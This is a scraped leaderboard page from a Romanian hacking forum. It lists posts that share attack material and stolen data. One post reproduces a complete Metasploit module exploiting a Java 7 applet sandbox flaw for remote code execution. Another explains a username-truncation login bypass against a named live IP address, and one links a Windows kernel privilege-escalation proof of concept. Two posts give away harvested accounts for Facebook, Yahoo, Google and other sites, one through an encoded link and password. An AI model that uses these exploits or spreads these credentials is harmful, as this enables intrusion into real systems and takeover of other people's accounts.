Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 08/27/12 in all areas

  1. Ce este PoS? PoS este o platforma web bazata pe sistemul de operare desktop creeat special pentru comunitatea RST (Romanian Security Team) inspirat dintr-un opensource. In multe feluri, este un sistem de operare desktop complet, cu management de fisiere si aplicatii, care functioneaza intr-un mediu draggable cu ferestre redimensionabile. Prezentare generala Asa cum am spus mai inainte, PoS ofera un desktop complet, cu o suita de aplicatii intr-un sistem care poate fi accesat online, prin intermediul unui browser web. Este un sistem care poate furniza o flota de calculatoare in retea in mediul Cloud, de asemena poate fi un refugiu personal atunci cand utilizati computerul altcuiva. Atunci cand se investigheaza un sistem, cum ar fi PoS, cei mai multi oameni vor intreba despre performanta. Asa cum era de asteptat, lansarea aplicatiilor si viteza de executie sunt rapide, comparativ cu restul sistemelor de operare desktop in sistem cloud. Cu toate acestea, daca te gandesti la asta, PoS ofera un sistem ce poate fi comparat cu un PC online, de aici si numele PoS (Personal Online System). Deci, care sunt avantajele? Ei bine, implicit ofera o gama larga de aplicatii, inclusiv un calendar, un cititor RSS, un client de e-mail, un procesor de texte, o foaie de calcul, un manager de contacte, client FTP si SSH, jocuri, broswer anonim, music player, video player, radio, picture viewer, picture editor, chat, messenger, share intr-e userii platformei, spatiu de 20 giga pentru useri si 50 giga pentru VIP-uri, sistem de management cu facilitatile necesare pentru a incarca si descarca fisiere. ***ATENTIE*** Nu se retin nici un fel de loguri sau ip-uri, absolut orice sesiune este anonima iar toate fisierele din conturile dumneavoastra sunt private si accesibile doar dumneavoastra. Site-ul PoS: www.p-o-s.org Poze: gra?ie: ps-axl, DarkyAngel
    1 point
  2. Daca tu imi pui limita in mysql pe coloana username de 32 de chr si nu imi verifici numarul de chr introdus in inregistrare pot sa inregistrez ceva de genul: username: admin x (admin urmat de cel putin 27 de space-uri si un x) password: 123456 Cand iti verifica daca exista deja username-ul iti va da false, dar cand il va introduce in baza de date, va introduce doar primele 32 de chr. Si poti sa te loghezi cu toate parolele, de exemplu: http://94.249.208.142/login.php username: admin password: hrnhrn sau username: admin password: 123123 Ambele sunt valide.
    1 point
  3. This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'jduck', # metasploit module 'sinn3r', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end Sursa:http://www.exploit-db.com/exploits/20865/
    1 point
  4. Source: Microsoft Windows Kernel Intel x64 SYSRET Proof Of Concept ? Packet Storm This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process. Exploit: http://www.exploit-db.com/sploits/20861.rar
    1 point
  5. Buffer_Overflow_Attacks_-_Detect,_Exploit,_Prevent_by_James_C._Foster_(Syngress_2005).pdf
    1 point
  6. câteva conturi strânse în ultima s?pt?mân?, eu nu am ce sa fac cu ele, poate o sa ave?i nevoie careva Conturi pe urm?toarele siteuri: https://login.intuitext.ro/ https://accounts.google.com/servicelogin http://www.divahair.ro/login http://www.jocurifete.ro/members_tops.php http://www.facebook.com/ http://www.metin2.ro/user/login https://www.gay-torrents.net/torrentslist.php https://www.enel.ro/crosweb/auth/doli http://zoophilestracker.com/index.php http://www.romaniatorrent.ro/login.php http://www.lunaris-online.org/ http://www.hi5.com/index.html www.yahoo.com www.hotmail.com https://login.yahoo.com/config/login_verify2 http://www.lasttorrents.org/ http://www.lasttorrents.org/login.php http://forum.cs1.ro/ucp.php http://0day.ro/login http://filelist.ro/browse.php http://jungla-urbana.com/login http://www.elitezones.ro/login.php http://www.extremeshare.org/tracker/index.php http://www.naruto-arena.com/ http://www.vplay.ro/login/ LINK: JTNESWoyb01LVW8yJTNEelJNR2NReFNxamdm29jenRrSEM1RTh6c0EvNTktY29udHVyaS56aXA= PAROLA: wrAMgmPWgWJRgl7yweVa0m+YjgJkgoL=zSwe8e3zvx/Tyy55 HINT: parola>> "facem haz de negaz, ca doar noi suntem baza" link>> "invers" PS: am criptat link-ul si parola ca sa nu aib? acces oricine la conturi.
    -1 points
  7. Azi am "prins" cateva conturi care mie nu imi sunt de folos ..poate aveti voi nevoie de ceva de aici! Link : Enjoy!
    -1 points
×
×
  • Create New...